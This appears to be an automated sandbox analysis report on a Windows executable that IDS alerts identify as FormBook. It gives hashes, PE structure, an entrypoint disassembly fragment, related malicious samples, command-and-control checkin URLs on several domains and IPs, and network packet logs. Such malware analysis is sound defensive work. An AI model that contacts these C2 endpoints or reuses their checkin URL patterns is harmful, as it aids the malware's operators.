                                                                      • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, Edge-Prod-FRA.env.au.au-msedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus15.cloudapp.net, wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, elasticShed.au.au-msedge.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, client.wns.windows.com, fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, a767.dscg3.akamai.net, afdap.au.au-msedge.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, au.au-msedge.net, blobcollector.events.data.trafficmanager.net, au.c-0001.c-msedge.net
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      No simulations

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      95.215.210.10QxnlprRUTx.exeGet hashmaliciousBrowse
                                                                      • www.cochez.club/dy8g/?Jn=M2y08b4guDc7ky1UfP9B2E9DVQMkOM+mjhyUMO8ZT8ajlM0broLEOhQJKjmEwKzzqjxp&2dM8l=bXbDpfbx6FA04L
                                                                      quote.exeGet hashmaliciousBrowse
                                                                      • www.oilepp.club/sgs8/?5joX=g/kFtZKPlgxqAQoU+wlNBUIJLf9Fcx+iYtqxvXVhE+9z/b8eYGNe36RCp3BFC2pgwHcV&D2M8=n6Aht2thEVdHtFzP
                                                                      RzLicilE0b.exeGet hashmaliciousBrowse
                                                                      • www.cochez.club/dy8g/?cPwPC=GvDdgdCxmzC8AL&Jj8hf8=M2y08b4guDc7ky1UfP9B2E9DVQMkOM+mjhyUMO8ZT8ajlM0broLEOhQJKjmEwKzzqjxp
                                                                      letterhead.exeGet hashmaliciousBrowse
                                                                      • www.rapurp.club/epms/?Cj30v=9rJhur7HoF7lOxC&x4uDfZgH=K5/mSQXSr23x/w/wVuTeR0A48OUt6IqKG3U9if3kYnbI39O8+SeWAMufgZ7J/RGM/FJB
                                                                      PO6543.exeGet hashmaliciousBrowse
                                                                      • www.zirrema.club/arug/?kfLlf8=WePorOziRm3dT6K3hneQ6fmiCjwbDaqEtdfFV6ZB0ObBVUAf2E30+4A2y/BajiHRCQCm&Yf0=ybFLLTR8hZjhx2
                                                                      DH7v8T4xFa.exeGet hashmaliciousBrowse
                                                                      • www.ouitum.club/nsag/?r6A=oyuKyynVjO0A9ce0TXUJOkg+PRrvkOYQG7y0ZxIeGgkEVxubI4D8c/ZpyjqbTZI03xFO&rVIDm=GBODAlxxjbuxRT
                                                                      ZTRADE0021.exeGet hashmaliciousBrowse
                                                                      • www.deitey.club/i8rz/?9r4P-=1ysJ3lWopnxW9GefGIty5IYzVShJJI8DXw1o7bIqniwmmXQsizYOZMj1tVFT/eUIzFsn+AWcxA==&1bS=WHrpCdQ08
                                                                      q5oRsfy1vk.exeGet hashmaliciousBrowse
                                                                      • www.leteva.club/w8en/?jrQDTX=t8bLyeK0DI5vLwV8yQwzQWSFYhc1yG8ON0Rl7Rqkh6Hs61Z4hvVeNgM7YBsF6F3Pp/Tj&K2JxgH=Exop8hRXRdA
                                                                      Sf6jgQc6Ww.exeGet hashmaliciousBrowse
                                                                      • www.keboate.club/oean/?5j=UjPt&DvjTU=QSIVnL8HxXhFJqDnObQFTaTfjHXZPmA+lfnypz2XDw+CpSlLz9CtCX9/im7M/Rpd1AtY
                                                                      btVnDhh5K7.exeGet hashmaliciousBrowse
                                                                      • www.keboate.club/oean/?Tj=YvFHu&wxl=QSIVnL8HxXhFJqDnObQFTaTfjHXZPmA+lfnypz2XDw+CpSlLz9CtCX9/im7M/Rpd1AtY
                                                                      bin.exeGet hashmaliciousBrowse
                                                                      • www.codedad.club/oncs/?tXUd=WDabN1kLr0eeaEJi5hB0qY/SQqmTyVeMQxg3iiKOowrTZ05AQIKvczEBWaeH6gSgjhMc&2ddpC=ftxDHdNX
                                                                      Order No. BCM190282.exeGet hashmaliciousBrowse
                                                                      • www.gourgio.club/w8en/?rvR86T=5YwAZxfr8BO/v8TT5gfgL0uEKqiEK71WcuoEStVUpKXrZ2OiCHsQMJK9T6jPO8wO+q3l&1bw=L6Ahp0_8jf-htd6p
                                                                      Shipping INVOICE-BL Shipment..exeGet hashmaliciousBrowse
                                                                      • www.wastie.club/mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=uH4Dxo5rCetYkfO7KLYRcfVECb5esRD5h1WtuccCG6pO/xNVWEKD01dxTzpIBP2UrYly
                                                                      172.104.157.41RzLicilE0b.exeGet hashmaliciousBrowse
                                                                      • www.vermogenswerte.com/dy8g/?cPwPC=GvDdgdCxmzC8AL&Jj8hf8=vEc9l3KIwUbL2yE9akOYH6tpFpdH8sidHZA37HjQYo0aYTivi/dQORBe2LpAM6isw8Zs
                                                                      75.2.81.221PQMW0W5h3X.exeGet hashmaliciousBrowse
                                                                      • www.thenorthgoldline.com/dy8g/?6l-=6lY0&A4Ll=ECrCAtcV2n6MmfvkEdEbFHcY5Y6SYRzoX56/iPQe4p5qRx/lRHZ+fK1TxUIBKPcHvB2GVYbV9w==
                                                                      Shipping Documents C1216.exeGet hashmaliciousBrowse
                                                                      • www.helpwithgre.com/fhg5/?idFt5Lt8=2UtB8DcbqqUNdGGafXCP7IZK2b+ICtd8++zQoCDv+Hjw8z9Bnq28qASc6PfUd7Mbl5s7loQVOw==&TZ=EjUt0xR

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      www.aizaibali.comv8kZUFgdD4.exeGet hashmaliciousBrowse
                                                                      • 154.88.31.204
                                                                      QxnlprRUTx.exeGet hashmaliciousBrowse
                                                                      • 154.88.31.204
                                                                      w3Qf2wBNX7.exeGet hashmaliciousBrowse
                                                                      • 154.88.31.204
                                                                      825610.parkingcrew.netPQMW0W5h3X.exeGet hashmaliciousBrowse
                                                                      • 75.2.81.221
                                                                      Shipping Documents C1216.exeGet hashmaliciousBrowse
                                                                      • 75.2.81.221
                                                                      47DOC008699383837383 PDF.exeGet hashmaliciousBrowse
                                                                      • 54.72.9.115
                                                                      29SCAN 0750.exeGet hashmaliciousBrowse
                                                                      • 54.72.9.115
                                                                      www.garimpeirastore.onlineQxnlprRUTx.exeGet hashmaliciousBrowse
                                                                      • 209.99.40.222
                                                                      seBe6bgLTw.exeGet hashmaliciousBrowse
                                                                      • 209.99.40.222
                                                                      0FKzNO1g3P.exeGet hashmaliciousBrowse
                                                                      • 209.99.40.222

                                                                      ASN

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      LINODE-APLinodeLLCUSGw6boin32F.exeGet hashmaliciousBrowse
                                                                      • 176.58.123.25
                                                                      Swift-Payment_Details.xlsxGet hashmaliciousBrowse
                                                                      • 173.255.194.134
                                                                      2fZSExq7dm.exeGet hashmaliciousBrowse
                                                                      • 176.58.123.25
                                                                      9QFzJlxaTl.dllGet hashmaliciousBrowse
                                                                      • 176.58.123.25
                                                                      CefN2XNyFiGet hashmaliciousBrowse
                                                                      • 45.79.143.159
                                                                      lovemetertok.dllGet hashmaliciousBrowse
                                                                      • 176.58.123.25
                                                                      Item_positions_receipt_564965.xlsmGet hashmaliciousBrowse
                                                                      • 176.58.123.25
                                                                      Signed PEARLTECH contract and PO.exeGet hashmaliciousBrowse
                                                                      • 173.255.194.134
                                                                      XfKsLIPLUuGet hashmaliciousBrowse
                                                                      • 50.116.8.237
                                                                      Reciept 2868661.xlsbGet hashmaliciousBrowse
                                                                      • 178.79.147.66
                                                                      nO9g6aIpZp.exeGet hashmaliciousBrowse
                                                                      • 178.79.130.185
                                                                      zgMatT7LEs.exeGet hashmaliciousBrowse
                                                                      • 66.175.218.106
                                                                      borderCurr.dllGet hashmaliciousBrowse
                                                                      • 176.58.123.25
                                                                      triage_dropped_file.dllGet hashmaliciousBrowse
                                                                      • 176.58.123.25
                                                                      vZksc78XID.dllGet hashmaliciousBrowse
                                                                      • 176.58.123.25
                                                                      mormanti.exeGet hashmaliciousBrowse
                                                                      • 66.228.49.173
                                                                      6J08VVHWxd.dllGet hashmaliciousBrowse
                                                                      • 176.58.123.25
                                                                      HocVKWxT9F.dllGet hashmaliciousBrowse
                                                                      • 176.58.123.25
                                                                      deepRats.exeGet hashmaliciousBrowse
                                                                      • 45.79.108.130
                                                                      NEWIT-ASRUQxnlprRUTx.exeGet hashmaliciousBrowse
                                                                      • 95.215.210.10
                                                                      quote.exeGet hashmaliciousBrowse
                                                                      • 95.215.210.10
                                                                      RzLicilE0b.exeGet hashmaliciousBrowse
                                                                      • 95.215.210.10
                                                                      letterhead.exeGet hashmaliciousBrowse
                                                                      • 95.215.210.10
                                                                      PO6543.exeGet hashmaliciousBrowse
                                                                      • 95.215.210.10
                                                                      DH7v8T4xFa.exeGet hashmaliciousBrowse
                                                                      • 95.215.210.10
                                                                      ZTRADE0021.exeGet hashmaliciousBrowse
                                                                      • 95.215.210.10
                                                                      q5oRsfy1vk.exeGet hashmaliciousBrowse
                                                                      • 95.215.210.10
                                                                      Sf6jgQc6Ww.exeGet hashmaliciousBrowse
                                                                      • 95.215.210.10
                                                                      btVnDhh5K7.exeGet hashmaliciousBrowse
                                                                      • 95.215.210.10
                                                                      bin.exeGet hashmaliciousBrowse
                                                                      • 95.215.210.10
                                                                      Order No. BCM190282.exeGet hashmaliciousBrowse
                                                                      • 95.215.210.10
                                                                      Shipping INVOICE-BL Shipment..exeGet hashmaliciousBrowse
                                                                      • 95.215.210.10

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      No created / dropped files found

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Entropy (8bit):7.971119501388661
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:pMbPS8nCm1.exe
                                                                      File size:177067
                                                                      MD5:de87f1794377537dda721afd9137e491
                                                                      SHA1:3b0480a4afe176722d9b8cf6f9f9c9257b1d132f
                                                                      SHA256:b0a684c7dfc5a94e3dd2edcb1c706eae088ff9d701ec55f0adb1ae977e5e9081
                                                                      SHA512:7916fe93f72a025663540894ca5c7678e345870bc32e54af6224394b2d1bd3991adbf9097d0d8af67363fa4e3ae0ec00ab407b0a5a24ffec2652457420d4aa14
                                                                      SSDEEP:3072:vMWOOOOOOOOOOOOOOHQ47MB3Fvd3cvtS99ZwlRtlL79ZF5/CGnrN8pCcFOOZPJIZ:EWOOOOOOOOOOOOOOH9sxd3+S9CRtlhEE
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Wtz.Wtz.Wtz.^...Ztz.Wt{.Itz.^...Vtz.^...Vtz.RichWtz.................PE..L...q..`.....................................0....@

                                                                      File Icon

                                                                      Icon Hash:00828e8e8686b000

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x401000
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x60F8EC71 [Thu Jul 22 03:56:33 2021 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:5
                                                                      OS Version Minor:0
                                                                      File Version Major:5
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:5
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:10de39a2884c15c1630de9015f14f501

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      push ebp
                                                                      mov ebp, esp
                                                                      sub esp, 00000678h
                                                                      mov byte ptr [ebp-00000290h], FFFFFFE9h
                                                                      mov byte ptr [ebp-0000028Fh], FFFFFF90h
                                                                      mov byte ptr [ebp-0000028Eh], 00000000h
                                                                      mov byte ptr [ebp-0000028Dh], 00000000h
                                                                      mov byte ptr [ebp-0000028Ch], 00000000h
                                                                      mov byte ptr [ebp-0000028Bh], 00000055h
                                                                      mov byte ptr [ebp-0000028Ah], FFFFFF8Bh
                                                                      mov byte ptr [ebp-00000289h], FFFFFFECh
                                                                      mov byte ptr [ebp-00000288h], 00000056h
                                                                      mov byte ptr [ebp-00000287h], FFFFFF8Bh
                                                                      mov byte ptr [ebp-00000286h], 00000075h
                                                                      mov byte ptr [ebp-00000285h], 00000008h
                                                                      mov byte ptr [ebp-00000284h], FFFFFFBAh
                                                                      mov byte ptr [ebp-00000283h], 00000073h
                                                                      mov byte ptr [ebp-00000282h], 00000014h
                                                                      mov byte ptr [ebp-00000281h], 00000000h
                                                                      mov byte ptr [ebp-00000280h], 00000000h
                                                                      mov byte ptr [ebp-0000027Fh], 00000057h
                                                                      mov byte ptr [ebp-0000027Eh], FFFFFFEBh
                                                                      mov byte ptr [ebp-0000027Dh], 0000000Eh
                                                                      mov byte ptr [ebp-0000027Ch], FFFFFF8Bh
                                                                      mov byte ptr [ebp-0000027Bh], FFFFFFCAh
                                                                      mov byte ptr [ebp-0000027Ah], FFFFFFD1h
                                                                      mov byte ptr [ebp-00000279h], FFFFFFE8h
                                                                      mov byte ptr [ebp-00000278h], FFFFFFC1h
                                                                      mov byte ptr [ebp-00000277h], FFFFFFE1h
                                                                      mov byte ptr [ebp-00000276h], 00000007h
                                                                      mov byte ptr [ebp+00000000h], 00000000h

                                                                      Rich Headers

                                                                      Programming Language:
                                                                      • [ C ] VS2008 SP1 build 30729
                                                                      • [IMP] VS2008 SP1 build 30729
                                                                      • [LNK] VS2008 SP1 build 30729

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x30900x8c.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x30000x90.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x10000x11420x1200False0.485677083333data4.74207504229IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                      .rdata0x30000x3fc0x400False0.5732421875data4.71317659598IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                      Imports

                                                                      DLLImport
                                                                      USER32.dllGrayStringA, GetDC
                                                                      GDI32.dllGetWorldTransform, GetTextMetricsW, SelectObject, AddFontResourceExA, GdiArtificialDecrementDriver, SetBoundsRect, CreateCompatibleDC
                                                                      SHLWAPI.dllStrNCatW, SHRegOpenUSKeyW, UrlUnescapeA, PathFindExtensionW, UrlEscapeW, PathCombineW, PathIsSystemFolderA, StrCmpW
                                                                      WINSPOOL.DRVGetPrinterDataExW, ConnectToPrinterDlg, DevQueryPrint, ConfigurePortA, DeviceCapabilitiesA, DeletePrinterDriverA
                                                                      MSVFW32.dllDrawDibBegin, MCIWndCreate, ICClose
                                                                      AVIFIL32.dllAVIMakeStreamFromClipboard, AVIStreamOpenFromFileA

                                                                      Network Behavior

                                                                      Snort IDS Alerts

                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                      07/22/21-18:05:29.842456TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973580192.168.2.534.102.136.180
                                                                      07/22/21-18:05:29.842456TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973580192.168.2.534.102.136.180
                                                                      07/22/21-18:05:29.842456TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973580192.168.2.534.102.136.180
                                                                      07/22/21-18:05:29.980778TCP1201ATTACK-RESPONSES 403 Forbidden804973534.102.136.180192.168.2.5
                                                                      07/22/21-18:05:40.590605TCP1201ATTACK-RESPONSES 403 Forbidden804973634.102.136.180192.168.2.5
                                                                      07/22/21-18:05:45.704566TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973980192.168.2.5172.104.157.41
                                                                      07/22/21-18:05:45.704566TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973980192.168.2.5172.104.157.41
                                                                      07/22/21-18:05:45.704566TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973980192.168.2.5172.104.157.41
                                                                      07/22/21-18:05:51.027598TCP1201ATTACK-RESPONSES 403 Forbidden804974075.2.81.221192.168.2.5
                                                                      07/22/21-18:06:08.622399TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974380192.168.2.534.102.136.180
                                                                      07/22/21-18:06:08.622399TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974380192.168.2.534.102.136.180
                                                                      07/22/21-18:06:08.622399TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974380192.168.2.534.102.136.180
                                                                      07/22/21-18:06:08.765433TCP1201ATTACK-RESPONSES 403 Forbidden804974334.102.136.180192.168.2.5
                                                                      07/22/21-18:06:29.722039TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974580192.168.2.5209.99.40.222
                                                                      07/22/21-18:06:29.722039TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974580192.168.2.5209.99.40.222
                                                                      07/22/21-18:06:29.722039TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974580192.168.2.5209.99.40.222

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Jul 22, 2021 18:05:24.420397043 CEST4973480192.168.2.595.215.210.10
                                                                      Jul 22, 2021 18:05:24.558319092 CEST804973495.215.210.10192.168.2.5
                                                                      Jul 22, 2021 18:05:24.565618992 CEST4973480192.168.2.595.215.210.10
                                                                      Jul 22, 2021 18:05:24.568625927 CEST4973480192.168.2.595.215.210.10
                                                                      Jul 22, 2021 18:05:24.706835985 CEST804973495.215.210.10192.168.2.5
                                                                      Jul 22, 2021 18:05:24.706911087 CEST804973495.215.210.10192.168.2.5
                                                                      Jul 22, 2021 18:05:24.707521915 CEST804973495.215.210.10192.168.2.5
                                                                      Jul 22, 2021 18:05:24.709042072 CEST4973480192.168.2.595.215.210.10
                                                                      Jul 22, 2021 18:05:24.709491968 CEST4973480192.168.2.595.215.210.10
                                                                      Jul 22, 2021 18:05:24.858376026 CEST804973495.215.210.10192.168.2.5
                                                                      Jul 22, 2021 18:05:29.799993992 CEST4973580192.168.2.534.102.136.180
                                                                      Jul 22, 2021 18:05:29.842174053 CEST804973534.102.136.180192.168.2.5
                                                                      Jul 22, 2021 18:05:29.842305899 CEST4973580192.168.2.534.102.136.180
                                                                      Jul 22, 2021 18:05:29.842456102 CEST4973580192.168.2.534.102.136.180
                                                                      Jul 22, 2021 18:05:29.884633064 CEST804973534.102.136.180192.168.2.5
                                                                      Jul 22, 2021 18:05:29.980777979 CEST804973534.102.136.180192.168.2.5
                                                                      Jul 22, 2021 18:05:29.980814934 CEST804973534.102.136.180192.168.2.5
                                                                      Jul 22, 2021 18:05:29.980947971 CEST4973580192.168.2.534.102.136.180
                                                                      Jul 22, 2021 18:05:29.981005907 CEST4973580192.168.2.534.102.136.180
                                                                      Jul 22, 2021 18:05:30.282537937 CEST4973580192.168.2.534.102.136.180
                                                                      Jul 22, 2021 18:05:30.325236082 CEST804973534.102.136.180192.168.2.5
                                                                      Jul 22, 2021 18:05:40.409492016 CEST4973680192.168.2.534.102.136.180
                                                                      Jul 22, 2021 18:05:40.451663971 CEST804973634.102.136.180192.168.2.5
                                                                      Jul 22, 2021 18:05:40.452857018 CEST4973680192.168.2.534.102.136.180
                                                                      Jul 22, 2021 18:05:40.453010082 CEST4973680192.168.2.534.102.136.180
                                                                      Jul 22, 2021 18:05:40.494915009 CEST804973634.102.136.180192.168.2.5
                                                                      Jul 22, 2021 18:05:40.590605021 CEST804973634.102.136.180192.168.2.5
                                                                      Jul 22, 2021 18:05:40.590624094 CEST804973634.102.136.180192.168.2.5
                                                                      Jul 22, 2021 18:05:40.590764999 CEST4973680192.168.2.534.102.136.180
                                                                      Jul 22, 2021 18:05:40.590826035 CEST4973680192.168.2.534.102.136.180
                                                                      Jul 22, 2021 18:05:40.892844915 CEST4973680192.168.2.534.102.136.180
                                                                      Jul 22, 2021 18:05:40.934571981 CEST804973634.102.136.180192.168.2.5
                                                                      Jul 22, 2021 18:05:45.662502050 CEST4973980192.168.2.5172.104.157.41
                                                                      Jul 22, 2021 18:05:45.704116106 CEST8049739172.104.157.41192.168.2.5
                                                                      Jul 22, 2021 18:05:45.704224110 CEST4973980192.168.2.5172.104.157.41
                                                                      Jul 22, 2021 18:05:45.704566002 CEST4973980192.168.2.5172.104.157.41
                                                                      Jul 22, 2021 18:05:45.746088982 CEST8049739172.104.157.41192.168.2.5
                                                                      Jul 22, 2021 18:05:45.750137091 CEST8049739172.104.157.41192.168.2.5
                                                                      Jul 22, 2021 18:05:45.750384092 CEST8049739172.104.157.41192.168.2.5
                                                                      Jul 22, 2021 18:05:45.750467062 CEST4973980192.168.2.5172.104.157.41
                                                                      Jul 22, 2021 18:05:45.750477076 CEST8049739172.104.157.41192.168.2.5
                                                                      Jul 22, 2021 18:05:45.750710964 CEST8049739172.104.157.41192.168.2.5
                                                                      Jul 22, 2021 18:05:45.750773907 CEST4973980192.168.2.5172.104.157.41
                                                                      Jul 22, 2021 18:05:45.750792980 CEST8049739172.104.157.41192.168.2.5
                                                                      Jul 22, 2021 18:05:45.750893116 CEST8049739172.104.157.41192.168.2.5
                                                                      Jul 22, 2021 18:05:45.750974894 CEST8049739172.104.157.41192.168.2.5
                                                                      Jul 22, 2021 18:05:45.751004934 CEST8049739172.104.157.41192.168.2.5
                                                                      Jul 22, 2021 18:05:45.751007080 CEST4973980192.168.2.5172.104.157.41
                                                                      Jul 22, 2021 18:05:45.751020908 CEST8049739172.104.157.41192.168.2.5
                                                                      Jul 22, 2021 18:05:45.751085997 CEST8049739172.104.157.41192.168.2.5
                                                                      Jul 22, 2021 18:05:45.751219988 CEST4973980192.168.2.5172.104.157.41
                                                                      Jul 22, 2021 18:05:45.751271963 CEST4973980192.168.2.5172.104.157.41
                                                                      Jul 22, 2021 18:05:45.751358986 CEST4973980192.168.2.5172.104.157.41
                                                                      Jul 22, 2021 18:05:50.830846071 CEST4974080192.168.2.575.2.81.221
                                                                      Jul 22, 2021 18:05:50.873204947 CEST804974075.2.81.221192.168.2.5
                                                                      Jul 22, 2021 18:05:50.873344898 CEST4974080192.168.2.575.2.81.221
                                                                      Jul 22, 2021 18:05:50.873647928 CEST4974080192.168.2.575.2.81.221
                                                                      Jul 22, 2021 18:05:50.915102959 CEST804974075.2.81.221192.168.2.5
                                                                      Jul 22, 2021 18:05:51.027597904 CEST804974075.2.81.221192.168.2.5
                                                                      Jul 22, 2021 18:05:51.027626991 CEST804974075.2.81.221192.168.2.5
                                                                      Jul 22, 2021 18:05:51.027852058 CEST4974080192.168.2.575.2.81.221
                                                                      Jul 22, 2021 18:05:51.027976990 CEST4974080192.168.2.575.2.81.221
                                                                      Jul 22, 2021 18:05:51.054819107 CEST804974075.2.81.221192.168.2.5
                                                                      Jul 22, 2021 18:05:51.054953098 CEST4974080192.168.2.575.2.81.221
                                                                      Jul 22, 2021 18:05:51.069421053 CEST804974075.2.81.221192.168.2.5
                                                                      Jul 22, 2021 18:06:01.784503937 CEST4974180192.168.2.5154.88.31.204
                                                                      Jul 22, 2021 18:06:02.012566090 CEST8049741154.88.31.204192.168.2.5
                                                                      Jul 22, 2021 18:06:02.519721985 CEST4974180192.168.2.5154.88.31.204
                                                                      Jul 22, 2021 18:06:02.755395889 CEST8049741154.88.31.204192.168.2.5
                                                                      Jul 22, 2021 18:06:03.269886017 CEST4974180192.168.2.5154.88.31.204
                                                                      Jul 22, 2021 18:06:03.498265982 CEST8049741154.88.31.204192.168.2.5
                                                                      Jul 22, 2021 18:06:07.655210018 CEST4974280192.168.2.5154.88.31.204
                                                                      Jul 22, 2021 18:06:07.886217117 CEST8049742154.88.31.204192.168.2.5
                                                                      Jul 22, 2021 18:06:08.395172119 CEST4974280192.168.2.5154.88.31.204
                                                                      Jul 22, 2021 18:06:08.579940081 CEST4974380192.168.2.534.102.136.180
                                                                      Jul 22, 2021 18:06:08.622020006 CEST804974334.102.136.180192.168.2.5
                                                                      Jul 22, 2021 18:06:08.622199059 CEST4974380192.168.2.534.102.136.180
                                                                      Jul 22, 2021 18:06:08.622399092 CEST4974380192.168.2.534.102.136.180
                                                                      Jul 22, 2021 18:06:08.627537012 CEST8049742154.88.31.204192.168.2.5
                                                                      Jul 22, 2021 18:06:08.664433956 CEST804974334.102.136.180192.168.2.5
                                                                      Jul 22, 2021 18:06:08.765433073 CEST804974334.102.136.180192.168.2.5
                                                                      Jul 22, 2021 18:06:08.765459061 CEST804974334.102.136.180192.168.2.5
                                                                      Jul 22, 2021 18:06:08.769030094 CEST4974380192.168.2.534.102.136.180
                                                                      Jul 22, 2021 18:06:08.769263983 CEST4974380192.168.2.534.102.136.180
                                                                      Jul 22, 2021 18:06:09.082741976 CEST4974380192.168.2.534.102.136.180
                                                                      Jul 22, 2021 18:06:09.124838114 CEST804974334.102.136.180192.168.2.5
                                                                      Jul 22, 2021 18:06:09.129683971 CEST4974280192.168.2.5154.88.31.204
                                                                      Jul 22, 2021 18:06:09.360474110 CEST8049742154.88.31.204192.168.2.5

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Jul 22, 2021 18:04:09.703279972 CEST6173353192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:04:09.756174088 CEST53617338.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:04:10.560837984 CEST6544753192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:04:10.613598108 CEST53654478.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:04:11.544034004 CEST5244153192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:04:11.593672037 CEST53524418.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:04:12.843043089 CEST6217653192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:04:12.892234087 CEST53621768.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:04:13.708331108 CEST5959653192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:04:13.757579088 CEST53595968.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:04:14.976648092 CEST6529653192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:04:15.026065111 CEST53652968.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:04:15.870773077 CEST6318353192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:04:15.922878027 CEST53631838.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:04:17.254570961 CEST6015153192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:04:17.313491106 CEST53601518.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:04:18.460608006 CEST5696953192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:04:18.517884016 CEST53569698.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:04:29.469683886 CEST5516153192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:04:29.536891937 CEST53551618.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:04:38.770940065 CEST5475753192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:04:38.833014965 CEST53547578.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:05:02.792947054 CEST4999253192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:05:02.842144966 CEST53499928.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:05:03.003333092 CEST6007553192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:05:03.063633919 CEST53600758.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:05:03.668939114 CEST5501653192.168.2.58.8.8.8
                                                                      Jul 22, 2021 18:05:03.729618073 CEST53550168.8.8.8192.168.2.5
                                                                      Jul 22, 2021 18:05:05.237622023 CEST6434553192.168.2.58.8.8.8
